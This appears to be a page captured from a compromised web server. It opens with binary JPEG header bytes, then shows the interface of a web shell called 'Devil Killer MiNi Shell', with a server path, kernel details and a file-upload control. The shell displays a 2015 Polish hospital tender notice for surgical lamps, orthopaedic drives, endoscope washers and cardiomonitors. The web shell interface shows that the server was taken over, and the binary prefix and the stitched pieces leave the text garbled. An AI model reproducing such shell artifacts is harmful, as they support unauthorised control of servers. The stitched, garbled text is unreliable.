JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/330094-N-2015.html

<p class="kh_header"><b>Siemianowice Śląskie: Dostawa sprzętu medycznego dla potrzeb 
Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 330094 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Siemianowicach Śląskich Spółka z o.o. , ul. 1-go Maja 9, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 32 2281930, faks 32 2281498.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsiemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego dla potrzeb 
Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET NR 1
Jednokopułowa lampa operacyjna bezcieniowa mocowana do sufitu za pomocą podkonstrukcji dystansowej. 
Czasze oświetleniowe wielosegmentowe ze źródłem światła w postaci diod LED. 
Ramiona wychodzące z jednego zawiesia sufitowego - zawiesie posiadające osłonę zakrywającą płytę stropową i wszystkie przyłącza elektryczne.- 1 szt.
PAKIET NR 2
Napęd do chirurgii ortopedycznej- 1 szt
PAKIET NR 3
Automatyczna myjnia endoskopowa - 1 szt.
PAKIET NR 4
KARDIOMONITOR - 2 szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający nie wymaga dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Zamawiający wymaga złożenia stosownego wykazu  wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem stosownych dowodów potwierdzających, że dostawy te zostały wykonane lub są wykonywane należycie.  Dla Zamawiającego spełnieniem warunku będzie wykazanie należytego wykonania w w/w okresie co najmniej jednej  dostawy  w zakresie sprzętu medycznego o wartości brutto nie niższej niż  5 000,00 zł, potwierdzonej stosownymi dowodami, że została ona wykonana należycie lub, że jest ona wykonywana należycie.
Wzór wykazu dostaw stanowi załącznik nr 5 do SIWZ.
Zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie dokumentów  jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane dowodami potwierdzającymi należyte wykonanie dostaw mogą być:
-	poświadczenia np. referencje, z tym , że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
-	oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Jeżeli Wykonawca wykonywał wcześniej dostawy na rzecz Zamawiającego, które są ujęte w wykazie wykonanych dostaw nie ma obowiązku przedkładania ich dowodów wraz ze składaną ofertą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający nie wymaga dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający nie wymaga dodatkowego dokumentu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku Zamawiający nie wymaga dodatkowego dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - OKres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski.siemianowice.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Siemianowicach Śląskich Sp. z o.o.
Ul. 1-go Maja 9
41-100 Siemianowice Śląskie 
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 09:30, miejsce: Szpital Miejski w Siemianowicach Śląskich Sp. z o.o.
Ul. 1-go Maja 9
41-100 Siemianowice Śląskie 
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Jednokopułowa lampa operacyjna bezcieniowa mocowana do sufitu za pomocą podkonstrukcji dystansowej. 
Czasze oświetleniowe wielosegmentowe ze źródłem światła w postaci diod LED. 
Ramiona wychodzące z jednego zawiesia sufitowego - zawiesie posiadające osłonę zakrywającą płytę stropową i wszystkie przyłącza elektryczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Źródło światła diody LED - diody nowej generacji białe. Pobór mocy przez kopułę - 50 W. Kopuła wyposażona w 110 diod.
2	Regulacja średnicy pola operacyjnego w obu kopułach realizowana jest za pomocą sterylizowanego, wymiennego uchwytu umieszczonego w centralnej części czaszy lampy
3	Średnica kopuły głównej i satelitarnej 63 cm. Dodatkowo kopuły wyposażone są w reling (uchwyt niesterylizowany) na 75 % obwodu - średnica kopy z relingiem wynosi około 70 cm.
4	Obudowa wykonana z metali lekkich, moduły świetlne osłonięte szybą ze szkła bezpiecznego.
5	Obudowy kopuły w kształcie koła w celu minimalizacji zakłóceń przepływu laminarnego.
6	Kopuła wyposażona w 7 modułów świetlnych: 6 modułów po 15 diod LED, jeden moduł świetlny posiadający 20 diod LED. 
7	Natężenia oświetlenia w odległości 1m - 160 000 luksów
8	Temperatura barwowa regulowana w zakresie 4000-4400-4800 K
9	Średnica pola roboczego regulowana w zakresie 15 cm - 30 cm
10	Współczynnik odwzorowania barw (Ra) 95
11	Wgłębność oświetlenia 130 cm
12	Wartość oświetlenia przy przesłonięciu jedną maską: 96%
13	Wartość oświetlenia przy przesłonięciu dwiema maskami: 71%
14	Kopuła wyposażona jest w niesterylizowany uchwyt prętowy zintegrowany z kopułą lampy, wykonany w ten sposób, że pozwala na wsunięcie całej dłoni i jej zaciśnięcie co umożliwia pewny chwyt podczas przemieszczania lampy oraz łatwe i szybkie ustawienie kopuły niezależnie od jej położenia. Uchwyt otacza min. 75 % obwodu kopuły. 
15	Kopuła wyposażona układ redukcji cieni polegający na zwiększeniu intensywności świecenia diod w panelu centralnym przy zmniejszeniu natężenia oświetlenia diod zewnętrznych. Sterowanie układem realizowane jest z dwóch niezależnych paneli sterujących umieszczonych symetrycznie po obu stronach kopuły.
16	Kopuła zamocowana na podwójnym ramieniu o zasięgu 165 cm
17	Możliwość obrotu ramienia stałego o nx360° wokół mocowania głównego
18	Natężenie światła regulowane w zakresie 25÷100% za pomocą dwóch niezależnych paneli umieszczonych po obu stronach kopuły. Takie nowatorskie rozwiązanie zapewnia prostotę sterowania bez względu na położenie kopuły. Sterowanie elektroniczne realizowane w 10 stopniach
19	Wyłącznik lampy umieszczony na dwóch niezależnych panelach sterujących zlokalizowanych po obu stronach kopuły.
20	Tryb endo - tryb oświetlenia dla potrzeb chirurgii mało inwazyjnej (funkcja oświetlenia endoskopowego - kolor zielony). Funkcja uruchamiana niezależnie z dwóch paneli sterujących umieszczonych po obu stronach kopuły.
21	Żywotność układu świetlnego - min 40 000 godzin
22	Maksymalne natężenie napromieniowania 350 W/m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Napęd do chirurgii ortopedycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rękojeść napędu wiertarskiego- 1 szt.
Konstrukcja modularna, lekka obudowa wykonana z aluminium
Silniki napędów sterowane elektronicznie o mocy znamionowej 250W z ograniczeniem prądowym mocy maksymalnej 600W
Płynna regulacja prędkości obrotowej. Obroty prawo lewo, oscylacja.
Zakres obrotów:
-  wiercenie 0-1200 obr na min
-  rozwiertak   0-270 obr na min
Kaniulacja maksymalna  4.0 mm
Maksymalny moment obrotowy: 
- wiercenie min.  4.63Nm
- rozwiercanie min.  17.74Nm
-moment obrotowy regulowany pokrętłem na rękojeści
Komora na akumulatory zamykana zatrzaskowo (zabezpieczona przed przypadkowym otwarciem dodatkową blokadą), uszczelniona.
System wielofunkcyjny współpracującymi z różnorodnymi nasadkami ( 15 )
Rękojeść kompatybilna z posiadanymi przez Szpital nasadkami, bateriami oraz ładowarką
2.	Nasadka - 1szt.
typu Jacobs z kluczem 0-6,35mm
Prędkość obrotowa: 270 - 1200 obr. na min.; moment obrotowy: 4.63 -17.74 Nm 
Moment oraz prędkość obrotowa regulowane pokrętłem na rękojeści
Nasadka  kompatybilna z posiadaną przez Szpital rękojeścią, bateriami oraz ładowarką
3.	Kluczyk do nasadek typu Jacobs- 1szt.
4.	Nasadka  Hudson- 1 szt.
Prędkość obrotowa: 270-1200 obr. na min.; moment obrotowy: 4.63-17.74 Nm. Moment oraz prędkość obrotowa regulowane pokrętłem na rękojeści
Nasadka  kompatybilna z posiadaną przez Szpital rękojeścią, bateriami oraz ładowarką
5.	Nasadka Hudson Trinkle modyfikowany- 1szt.
Prędkość obrotowa: 270- 1200 obr.-min.; moment obrotowy: 4.63-17.74 Nm. Moment oraz prędkość obrotowa regulowane pokrętłem na rękojeści
Nasadka  kompatybilna z posiadaną przez Szpital rękojeścią, bateriami oraz ładowarką
6.	Baterie sterylne - 2 szt.
- Typ ogniw akumulatorów sterylnych: NiCd
- Napięcie wyjściowe 9.6V
- Pojemność:  1.2Ah
- Energia: 11.52Wh 
- Waga: i 0.55kg
- Metody sterylizacji: autoklaw (Flash, Hi-Vac), tlenek etylenu (ETO), plazma
Baterie kompatybilne z posiadaną przez Szpital rękojeścią, oraz ładowarką
7.	Kaseta sterylizacyjna metalowa- 1 szt. 
II.	Serwis Gwarancyjny
10	Okres gwarancji na napęd wraz z uchwytami min. 24 m-ce
Okres gwarancji na baterie: 12  m-cy.
Wymagane przeglądy okresowe wykonywane przez autoryzowany serwis w trakcie gwarancji na koszt Wykonawcy
Zastępczy sprzęt na okres naprawy przekraczający 72 godziny
III.	Inne
11.	Szkolenie w zakresie obsługi sprzętu w siedzibie zamawiającego dla personelu medycznego oraz technicznego
Przekazanie sprzętu protokołem zgodnie z zawartą umową 
Instrukcje w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Automatyczna myjnia endoskopowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Myjnia na dwa endoskopy (pozwala na jednoczesną dezynfekcję dwóch endoskopów giętkich)
2	Przeznaczona jest do mycia i dezynfekcji wszystkich typów zanurzalnych endoskopów giętkich
3	Posiada automatyczny proces mycia i dezynfekcji
4	Urządzenie, które posiadając wszystkie wymagane polskim prawem zezwolenia i aprobaty techniczne realizuje automatyczny proces mycia endoskopów obejmujący nie mniej niż: 
5	mycie wstępne z użyciem detergentu
6	mycie zasadnicze
7	dezynfekcję chemiczno-termiczna
8	płukanie
9	płukanie alkoholem kanałów
10	suszenie
11	Myjnia pozwala na dowolny wybór środków dezynfekcyjnych (możliwość stosowania środków myjących i dezynfekujących różnych producentów)
12	Myjnia pracuje w systemie zamkniętym
13	Myjnia pozwala na jednokrotne jak i wielokrotne stosowanie płynu dezynfekującego
14	Myjnia dysponuje zbiornikiem na detergent o pojemności nie mniej niż 1 litr
15	Myjnia dysponuje zbiornikiem na płyn dezynfekcyjny ze stali kwasoodpornej
16	Myjnia posiada wbudowany tester szczelności endoskopu
17	Czas mycia i dezynfekcji może być indywidualnie programowany przez użytkownika
18	Panel sterowania jest w języku polskim
19	Myjnia posiada kilka programów automatycznego mycia i dezynfekcji
20	Panel sterujący/wyświetlacz wskazuje poszczególne fazy realizowanego cyklu
21	Myjnia posiada wbudowaną drukarkę, która dokumentuje przebieg procesu mycia i dezynfekcji
22	Dezynfekcja wody używanej w procesie mycia/dezynfekcji za pomocą lamy/lamp UV
23	Myjnia posiada filtr pochłaniający opary środków dezynfekcyjnych
24	Posiada dodatkowy system filtracji wody
25	Posiada możliwość podłączenia do standardowej instalacji hydraulicznej oraz sieci elektrycznej jednofazowej
26	Pokrywa myjni jest zabezpieczona przed przypadkowym otwarciem
27	Myjnia posiada zawór pozwalający na awaryjne zlanie płynu dezynfekcyjnego, w przypadku awarii zasilania i wykorzystania płynu do procesu ręcznej dezynfekcji
28	Myjnia posiada własne kółka (podwozie) i jest mobilna. Co najmniej 1 kółko ma możliwość blokady
29	Autoryzowany serwis techniczny w Polsce
30	W przypadku awarii myjni jeśli naprawa potrwa ponad 2 tygodnie serwis wstawia urządzenie zastępcze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KARDIOMONITOR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kardiomonitor o budowie kompaktowej - moduły zabudowane wewnątrz kardiomonitora. Wbudowana rączka do przenoszenia. 
2	Ekran min. 12 o rozdzielczości 800x600. Obsługa za pomocą pokrętła z przyciskami funkcyjnymi.
